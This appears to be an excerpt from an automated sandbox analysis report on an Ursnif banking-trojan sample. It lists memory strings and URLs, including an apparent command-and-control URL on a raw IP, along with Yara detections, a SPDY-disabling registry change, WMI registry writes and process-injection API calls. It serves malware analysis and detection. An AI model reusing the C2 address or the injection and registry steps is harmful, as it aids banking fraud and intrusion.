            Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
            Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
            Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
            Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.in/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.br/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
            Source: msapplication.xml1.4.drString found in binary or memory: http://www.google.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.google.cz/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.google.de/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.google.es/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.google.fr/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.google.it/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.google.pl/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.google.ru/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.google.si/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.iask.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
            Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
            Source: msapplication.xml2.4.drString found in binary or memory: http://www.live.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.mtv.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.najdi.si/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
            Source: msapplication.xml3.4.drString found in binary or memory: http://www.nytimes.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.orange.fr/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
            Source: msapplication.xml4.4.drString found in binary or memory: http://www.reddit.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.rtl.de/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
            Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
            Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.sogou.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.soso.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.taobao.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.target.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.tesco.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
            Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
            Source: msapplication.xml5.4.drString found in binary or memory: http://www.twitter.com/
            Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.univision.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
            Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.walmart.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
            Source: msapplication.xml6.4.drString found in binary or memory: http://www.wikipedia.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
            Source: msapplication.xml7.4.drString found in binary or memory: http://www.youtube.com/
            Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico
            Source: explorer.exe, 00000025.00000002.647622896.00000000053C4000.00000004.00000001.sdmpString found in binary or memory: https://185.156.172.54/images/TMwZ54mn/_2B0YUdRavAKwwypVOfrYnt/6W6xbFFdug/RuY3cr5ZWBeuRUS61/qsMNDxm8
            Source: powershell.exe, 0000001C.00000002.495468052.00000224A0A41000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 0000001C.00000002.495468052.00000224A0A41000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 0000001C.00000002.495468052.00000224A0A41000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 0000001C.00000002.477701499.0000022490BF0000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 0000001C.00000002.495468052.00000224A0A41000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: 5fd9d7ec9e7aetar.dllString found in binary or memory: https://sectigo.com/CPS0D
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
            Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000000.00000003.239593873.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000026.00000002.458481553.00000000009D6000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.239746568.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.239727168.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.381854498.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.456980641.0000000001240000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.239703401.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000003.454780333.0000000003070000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000026.00000003.445671426.0000026AEDB20000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.435428335.00000224A90B0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.239555043.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000002.641874278.0000000003B86000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.438096785.0000000001270000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.239627007.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.239757278.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.239668974.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6620, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 5508, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: control.exe PID: 5128, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3472, type: MEMORY
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100181C0 EntryPoint,DestroyCursor,CreateMetaFileA,CloseFigure,AbortPath,DestroyCursor,GetMapMode,CharUpperW,OpenIcon,CharNextA,GdiGetBatchLimit,GetClipboardOwner,IsGUIThread,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,0_2_100181C0
            Source: loaddll32.exe, 00000000.00000002.457120886.000000000153B000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

            E-Banking Fraud:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000000.00000003.239593873.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000026.00000002.458481553.00000000009D6000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.239746568.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.239727168.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.381854498.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.456980641.0000000001240000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.239703401.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000003.454780333.0000000003070000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000026.00000003.445671426.0000026AEDB20000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.435428335.00000224A90B0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.239555043.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000002.641874278.0000000003B86000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.438096785.0000000001270000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.239627007.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.239757278.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.239668974.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6620, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 5508, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: control.exe PID: 5128, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3472, type: MEMORY
            Disables SPDY (HTTP compression, likely to perform web injects)Show sources
            Source: C:\Windows\explorer.exeRegistry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

            System Summary:

            barindex
            Writes or reads registry keys via WMIShow sources
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Writes registry values via WMIShow sources
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_01511ADC GetLastError,NtClose,0_2_01511ADC
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_01511A34 GetProcAddress,NtCreateSection,memset,0_2_01511A34
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_015110BA NtMapViewOfSection,0_2_015110BA
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_015123F5 NtQueryVirtualMemory,0_2_015123F5
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F679B3 NtMapViewOfSection,0_2_02F679B3
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F671B9 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,0_2_02F671B9
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F67B01 GetProcAddress,NtCreateSection,memset,0_2_02F67B01
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F6B2FD NtQueryVirtualMemory,0_2_02F6B2FD
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0122B780 VirtualAlloc,VirtualAlloc,NtSetInformationProcess,0_2_0122B780
            Source: C:\Windows\explorer.exeCode function: 37_2_03B623A4 NtQueryInformationProcess,37_2_03B623A4
            Source: C:\Windows\explorer.exeCode function: 37_2_03B613A8 NtMapViewOfSection,37_2_03B613A8
            Source: C:\Windows\explorer.exeCode function: 37_2_03B58790 NtCreateSection,37_2_03B58790
            Source: C:\Windows\explorer.exeCode function: 37_2_03B60BE8 NtReadVirtualMemory,37_2_03B60BE8
            Source: C:\Windows\explorer.exeCode function: 37_2_03B52710 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,37_2_03B52710
            Source: C:\Windows\explorer.exeCode function: 37_2_03B672AC NtWriteVirtualMemory,37_2_03B672AC
            Source: C:\Windows\explorer.exeCode function: 37_2_03B68208 RtlAllocateHeap,NtQueryInformationProcess,37_2_03B68208
            Source: C:\Windows\explorer.exeCode function: 37_2_03B76A5C RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose,37_2_03B76A5C
            Source: C:\Windows\explorer.exeCode function: 37_2_03B62DC4 NtQueryInformationProcess,37_2_03B62DC4
            Source: C:\Windows\explorer.exeCode function: 37_2_03B710A0 NtQueryInformationToken,NtQueryInformationToken,NtClose,NtClose,37_2_03B710A0
